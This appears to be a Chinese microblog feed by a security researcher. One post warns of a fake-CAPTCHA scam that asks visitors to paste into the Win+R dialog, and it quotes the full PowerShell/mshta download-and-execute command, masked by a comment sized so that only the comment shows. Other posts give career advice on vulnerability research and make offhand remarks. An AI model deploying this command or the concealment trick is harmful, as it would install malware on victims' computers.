回复@unsigned_long_long_ago:Google 以及仔细阅读 Google 的结果，阅读手册，阅读代码，反复试验。 //@unsigned_long_long_ago:教主是如何快速学到这些知识的，有许多问题，我自己Google不到解决办法，你这里却写的很清楚

现在黑产有一种新的社交工程学挂马方案。

你访问一些网站的时候，网页忽然弹出提示，让你证明自己是真人。这倒也很常见，于是你点了一下那个验证窗口，又弹出提示，让你按 Win+R，然后 Ctrl+V，再回车（图一）。

你按下 Win+R，发现弹出一个窗口。再按 Ctrl+V，窗口里出现了：✅ 'I am not a robot: CAPTCHA Verification UID: 7811'（图二）。这好像真的是在做验证。但这时只要你再按一下回车，你的电脑就会下载并执行攻击者的木马。

因为在你最开始点击那个验证窗口的时候，网站向你的剪贴板中写入的内容实际是：

powershell -w 1 -C "$l='hττps://AAAAAAAA.AAA/AAAAAA.mp4';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}" # ✅ 'I am not a robot: CAPTCHA Verification UID: 7811'

这是一条下载并执行木马的命令。因为 Win+R 弹出的那个命令执行输入框地宽度有限，对过长的输入行只显示末尾部分。攻击者精确地控制内容长度，巧妙地让你只能看到末尾那段一点都不可疑的内容。等你明白过来的时候，已经晚了。

图三显然是一个受害者。

查了一下，现在火箭发射成本大概每公斤一万元。那么发射一个骨灰盒其实和买块墓地的钱差不多。

这两年经常有人问类似“做安全研究挖不到漏洞怎么办”这样的问题，这里统一答复一下。

早年没有信息安全专业，搞漏洞研究的全都是因为爱好这个，自己主动来搞的。不适合干这个，搞不出来的，自然也就还干本行去了。所以早年没有人抱怨为什么研究不出东西。

现在信息安全专业开设的越来越多，有些同学看别人搞漏洞研究，自己也想搞。搞不出来，就四处找人问为什么自己搞不出来，怎么才能搞出来。

首先，必须要先泼一瓢冷水：由于性格、能力等多方面原因，无论是不是学信息安全专业的，世界上大部分人都不适合做漏洞研究，就像大部分人都不适合做职业运动员一样。

你们琢磨一下漏洞是什么？漏洞是程序员犯的错误。那些著名大公司软件的漏洞是什么？是一些面试好多轮才能入职的名校毕业的程序员犯的错误。而且这些公司里还有很多面试好多轮才能入职的名校毕业的人在做安全。他们都没查出来，才能留下来让你去发现。

我曾给微软中国的 QA 做过培训，和他们连续接触了数天。这些人体现出来的平均水平肯定在国内安全行业（不特指漏洞研究）之上，其中有几个还相当出色。

所以，挖不到漏洞是正常的，挖到才不正常。信息安全工作有很多方向，学信息安全，不一定非要都做漏洞研究。

听说你们又发现了一个梅森数啊 网页链接